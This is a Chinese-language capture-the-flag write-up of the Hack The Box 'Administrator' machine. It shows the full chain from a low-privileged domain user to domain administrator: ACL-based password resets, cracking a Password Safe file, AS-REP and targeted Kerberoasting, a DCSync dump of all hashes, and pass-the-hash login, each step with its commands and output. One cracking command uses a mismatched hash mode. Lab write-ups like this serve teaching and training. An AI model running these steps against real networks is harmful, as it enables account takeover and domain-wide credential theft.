从零开始的Windows生活-Administrator

S M T W T F S　Back to the beginning.
日.一.二.三.四.五.六　回到最初
ずっと　見ています
一直 看着
アナタを　見ています
看着你
アナタのすべてが　きっと　終わるまで
看着你的一切 直到最后

---

靶机ip：10.129.201.160（由于比较卡换了好几次ip，见谅）

初始凭证：Username: Olivia Password: ichliebedich

难度：中等

涉及内容：

端口与服务扫描 (Nmap/NetExec)：端口发现及SMB/WinRM服务枚举。

域环境信息收集 (BloodHound)：自动化收集域内用户、计算机、组及ACL关系。

ACL权限滥用 (ACL Abuse)：

• GenericAll：接管账户权限。
• ForceChangePassword：强制重置密码。
• GenericWrite：修改用户属性。

敏感文件分析与破解：FTP文件获取及Password Safe (psafe3) 数据库解密。

Kerberos 攻击：

• AS-REP Roasting：通过禁用预身份验证获取哈希。
• Targeted Kerberoasting（提及）：通过设置SPN获取哈希。

DCSync 攻击：利用同步复制权限导出域内所有哈希。

哈希传递 (Pass-the-Hash)：使用NTLM Hash登录服务器。

---

端口扫描与基础服务枚举

nmap全端口扫描

┌─[sg-dedivip-1]─[10.10.14.70]─[skyarrow@htb-yjutg7usv8]─[~]
└──╼ [★]$ nmap -p- 10.129.201.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-18 00:21 CST
Nmap scan report for 10.129.201.160
Host is up (0.0038s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
51809/tcp open  unknown
51814/tcp open  unknown
51825/tcp open  unknown
51830/tcp open  unknown
51841/tcp open  unknown
51875/tcp open  unknown

nmap细节扫描

┌─[sg-dedivip-1]─[10.10.14.70]─[skyarrow@htb-yjutg7usv8]─[~]
└──╼ [★]$ nmap -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,51809,51814,51825,51830,51841,51875 -sV -sC -A 10.129.201.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-18 00:25 CST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.54% done; ETC: 00:25 (0:00:14 remaining)
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.54% done; ETC: 00:26 (0:00:31 remaining)
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 96.15% done; ETC: 00:26 (0:00:02 remaining)
Nmap scan report for 10.129.201.160
Host is up (0.0023s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-18 13:25:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
51809/tcp open  msrpc         Microsoft Windows RPC
51814/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
51825/tcp open  msrpc         Microsoft Windows RPC
51830/tcp open  msrpc         Microsoft Windows RPC
51841/tcp open  msrpc         Microsoft Windows RPC
51875/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|2022|2016|2019|2012|Vista|11|7|8.1|2008 (93%)
OS CPE: cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), Microsoft Windows Server 2016 build 10586 - 14393 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2019 (93%), Microsoft Windows Server 2016 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 11 21H2 (91%), Microsoft Windows 10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-01-18T13:26:11
|_  start_date: N/A
|_clock-skew: 7h00m00s

TRACEROUTE (using port 135/tcp)
HOP RTT     ADDRESS
1   3.11 ms 10.10.14.1
2   3.64 ms 10.129.201.160

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.72 seconds

暴露了域名administrator.htb，将其写入hosts

echo "10.129.201.160 administrator.htb dc.administrator.htb" >> /etc/hosts

ftp服务探测。

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #ftp 10.129.201.160
Connected to 10.129.201.160.
220 Microsoft FTP Service
Name (10.129.201.160:root): Olivia
331 Password required
Password: 
530 User cannot log in, home directory inaccessible.
ftp: Login failed
ftp> 
┌─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #nxc ftp 10.129.201.160 -u 'Olivia' -p 'ichliebedich'
FTP         10.129.201.160  21     10.129.201.160   [*] Banner: Microsoft FTP Service
FTP         10.129.201.160  21     10.129.201.160   [-] Olivia:ichliebedich (Response:530 User cannot log in, home directory inaccessible.)

当前用户无法访问ftp目录。

查看smb共享服务。

┌─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #nxc smb 10.129.201.160 -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.129.201.160  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.201.160  445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.129.201.160  445    DC               [*] Enumerated shares
SMB         10.129.201.160  445    DC               Share           Permissions     Remark
SMB         10.129.201.160  445    DC               -----           -----------     ------
SMB         10.129.201.160  445    DC               ADMIN$                          Remote Admin
SMB         10.129.201.160  445    DC               C$                              Default share
SMB         10.129.201.160  445    DC               IPC$            READ            Remote IPC
SMB         10.129.201.160  445    DC               NETLOGON        READ            Logon server share
SMB         10.129.201.160  445    DC               SYSVOL          READ            Logon server share

全是系统默认服务，没有自定义目录名，看了一圈也没什么东西。

枚举用户。

┌─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #nxc smb 10.129.201.160 -u 'Olivia' -p 'ichliebedich' --users
SMB         10.129.201.160  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.201.160  445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.129.201.160  445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.129.201.160  445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain
SMB         10.129.201.160  445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.129.201.160  445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account
SMB         10.129.201.160  445    DC               olivia                        2024-10-06 01:22:48 0
SMB         10.129.201.160  445    DC               michael                       2024-10-06 01:33:37 0
SMB         10.129.201.160  445    DC               benjamin                      2024-10-06 01:34:56 0
SMB         10.129.201.160  445    DC               emily                         2024-10-30 23:40:02 0
SMB         10.129.201.160  445    DC               ethan                         2024-10-12 20:52:14 0
SMB         10.129.201.160  445    DC               alexander                     2024-10-31 00:18:04 0
SMB         10.129.201.160  445    DC               emma                          2024-10-31 00:18:35 0

查看winrm服务

┌─[root@htb-yjutg7usv8]─[/home/skyarrow]
└──╼ #nxc winrm 10.129.201.160 -u 'Olivia' -p 'ichliebedich'
WINRM       10.129.201.160  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.201.160  5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

域环境自动化信息收集 (BloodHound)

那么用evil-winrm配合bloodhound登录上去收集一波信息（由于更换了服务器所以ip会有变动）

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -i 10.129.172.64 -u 'Olivia' -p 'ichliebedich'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> 

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #bloodhound-python -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.129.172.64 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 01S
INFO: Compressing output into 20260118010248_bloodhound.zip

ACL滥用链：从 Olivia 到 Benjamin

分析发现我们对用户michael有genericall权限，那么直接修改密码即可。

原理：GenericAll 也就是完全控制权。在Active Directory中，如果用户A对对象B拥有此权限，A可以对B做任何事，包括修改密码、添加组成员、甚至修改B的登录脚本。这是最高级别的滥用权限之一。

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael password123! /domain
The command completed successfully.

之后又发现用户micheal可强制修改用户benjamin密码，那么还是一样的操作。

这是 User-Force-Change-Password 扩展权限。它允许主体在不知道目标当前密码的情况下重置目标密码。与常规修改密码不同，这通常用于管理员重置遗忘的密码，但在攻击中可用于劫持账户。

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"password123!" -S "10.129.172.64"

敏感文件泄露与凭据破解

查看用户benjamin权限，发现其对ftp可读。

登录到ftp上看一眼。

┌─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #ftp 10.129.172.64
Connected to 10.129.172.64.
220 Microsoft FTP Service
Name (10.129.172.64:root): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||62403|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get "Backup.psafe3"
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||62404|)
125 Data connection already open; Transfer starting.
100% |*********************************|   952      311.03 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (298.26 KiB/s)
ftp> 

得到一个被密码保护过的文件，hashcat破解一下。

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #hashcat Backup.psafe3 
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD EPYC 9575F 64-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 9575F 64-Core Processor, 3922/7908 MB (988 MB allocatable), 4MCU

The following 37 hash-modes match the structure of your input hash:

      # | Name                                                       |
      \skip
       6233 | TrueCrypt Whirlpool + XTS 1536 bit (legacy)                | Full-Disk Encryption (FDE)
   5200 | Password Safe v3                                           | Password Manager

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #hashcat -m 5200 Backup.psafe3 rockyou2.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD EPYC 9575F 64-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 9575F 64-Core Processor, 3922/7908 MB (988 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: rockyou2.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Backup.psafe3:tekieromucho                                
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Sun Jan 18 01:17:53 2026 (0 secs)
Time.Estimated...: Sun Jan 18 01:17:53 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou2.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:    66897 H/s (4.97ms) @ Accel:256 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#2....: newzealand -> babygrl

Started: Sun Jan 18 01:17:45 2026
Stopped: Sun Jan 18 01:17:54 2026

成功破解出密码tekieromucho

里面拿到三组用户的凭据。

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

利用 GenericWrite 执行 Targeted Kerberoasting

经过测试，emily的桌面上发现user.txt。

而且发现用户emily对用户ethan有GenericWrite权限。

经过 BloodHound 分析，发现用户 emily 对用户 ethan 拥有 GenericWrite 权限。这意味着我们可以修改目标账户的属性。基于此权限，我们有两种不同的攻击方案来获取 ethan 的 Hash：

方案 A：AS-REP Roasting (修改预身份验证) 原理：利用写权限禁用用户的“Kerberos 预身份验证”属性，从而请求 AS-REP 消息进行离线破解。

1. 先使用 emily 登录，通过 PowerView 或原生模块禁用 ethan 的预认证： Set-ADAccountControl -Identity ethan -DoesNotRequirePreAuth $true
2. 使用 impacket 中的 GetNPUsers 获取 Hash： … (此处保留原文的 GetNPUsers 操作和 Hashcat 破解过程) …

方案 B：Targeted Kerberoasting (设置 SPN) 原理：利用写权限给 ethan 添加一个 Service Principal Name (SPN)，使其成为 Kerberoasting 的目标。

如果不想修改预认证设置，或者需要另一种持久化方式，可以使用 targetedKerberoast 工具。 注意：此方法对时间同步要求较高。

┌─[✗]─[root@htb-yjutg7usv8]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -i 10.129.172.64 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> Get-ADUser ethan | Set-ADAccountControl -doesnotrequirepreauth $true
对 AD 中的用户 ethan 账户禁用 Kerberos 预身份验证

之后借助impacket中的模块GetNPUsers获得用户ethan的hash。

hashcat -m 13100 ethan_hash.txt /usr/share/wordlists/rockyou.txt

破解其哈希，得到密码为limpbizkit。

或者我们也可以用targetedKerberoast进行攻击（不过要记得同步域控时间）

┌─[root@htb-da9rehgmmn]─[/home/skyarrow/Desktop/targetedKerberoast]
└──╼ #python3 targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$6cf8994cc318d87e8b3aee9b17569fb9$be9c1b90eb4763e145ce5f50daed168594fa2d90be7f67684ffc3c3d7bdd6d31f9a05225bbacf586ff07b1c2f3ba9dba698f964bc98fde2c64edede406823384988a72600da27d018d05c5634380ccc3c44ce830affe53e5e9a4b0308f90bb98a9de2d434d9f882ed0ff04a4f73adcd177669b8bc1348a6db15dbd9f15010984c0e4be66ee78c932794ce890675760a4bc780794897908e3075e982f7d8fad91a56744e7bed90eb0826ac700954393729f75b2138b5ff5426ad7f173e175d28f4586d340a2819b5d1959915de4d3e9421235bbd615fada6fb20c941aa073a28513acc727e45be55b5d9900abfb211c174be74b7859b43c5b1d75252ba897d07ad4d2fe065bb47dc99dc829517e1254bdd25614d5b4ad231a99a8ace490865ffa29ec605ba588b8a2411c5c3370e1905545f16c930975af2c028ee61bef14d3b40bd287a72ea6c718066882d9cac4eba06925a5106151097daea312f127270ba69d0952baa6a4216797dfbeb0925e4ca2ac360776adcc4491b937dde3523f92434c0509ec1e10c51af788a4edca8b67de069fc906f6a05eb0b8a72eb8055fb6d9c2080014d6052dde0af4b654a9cc8b718d5f3fa2ea4e86d1235ffcdab86d2f4b04aefef5d3821a8155b9c246a03d1f5bf23f4fd3294807b816a0c11b5af250ce342415a63b61aff4ae9120acabdb7ebe8f4e95e7a46b3057d9aa0fbc6189e4c19689d25afcc869d3fb0c49566acfef9aa33f7a8671aef3f6dba5b8294db75f4d0ecc13f0773503a2ae6472e34490123aabdb5e1322089f4c1b2f78a673e6a033a6e863f3405cc07b5731f4b7eeda7a434a664f8940717658d5e53060571e0478ffb6a4f23b225722236c33b2a593f8bdb04a3374b058fc85e12e9f2a56a67ae25f7e766a841ccb7e006824b252406a725963d56f38481c1969153c1d0625f490b84d2d8d17a83e61425f96589a3201b0eb214b3b7b4b47d2bb1727561a357410967e60643fb6bf1fcb84465e342fc2ec5da4a4876e0ef6afdcf909ec5ed7c41f130f562fb8b00e353190e1eb778bab0ef6072e007bda151d345fec0dc0eb7036584777503c249e9a711f39a45ba080c024000d3e5c69a298a41c448de01a0680a39bfc8849a9cd5368befbb2699257416fc8a82de9481f8a108313e225ae3710653e0c6203a7c4cec2b71caf14805ecefe80a46532c49fcb9725ba8ed13e5ae08a002354824c90fe2fc4720cb56d9208c14bf402b088f03a8c0fc222b36b000e4b5771bd5a17523319781b1bbcc2a8a6689a0f61fdedda0918122099e00ecf69906ad0bfd23484c8042c69613bde03b0f2ac4c5d9d4efe129921167954793f543143da97ac12c5675f550c76e63e31c1b99e7999500e07cee24cf3e2f56e60b37f14a1a599c3f7099a2b05f3fa6f5d88edb3db6c1aaf4a2588f60a4049b50d10ca9393ff0ff9a5b604c5dbe86075b6f00849170a5d4a46b2a6dc3619aba261a50e558ab432ea09e3607a2e89b9644075b2b52fcb342393c04836d312a43490
[VERBOSE] SPN removed successfully for (ethan)

DCSync 导出哈希与最终登录

检查 Ethan 的权限，发现其对域对象拥有 GetChanges 和 GetChangesAll 权限，这意味着我们可以执行 DCSync 攻击。

impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.201.176 -dc-ip 10.129.201.176

┌─[root@htb-da9rehgmmn]─[/home/skyarrow/Desktop]
└──╼ #impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.187.143 -dc-ip 10.129.187.143
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htb\michael:des-cbc-md5:43c2bc231598012a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htb\benjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 

成功拿到管理员的哈希，直接登录即可。

┌─[root@htb-da9rehgmmn]─[/home/skyarrow/Desktop/targetedKerberoast]
└──╼ #evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator

总体来说是很友好的靶机，作为域入门很合适。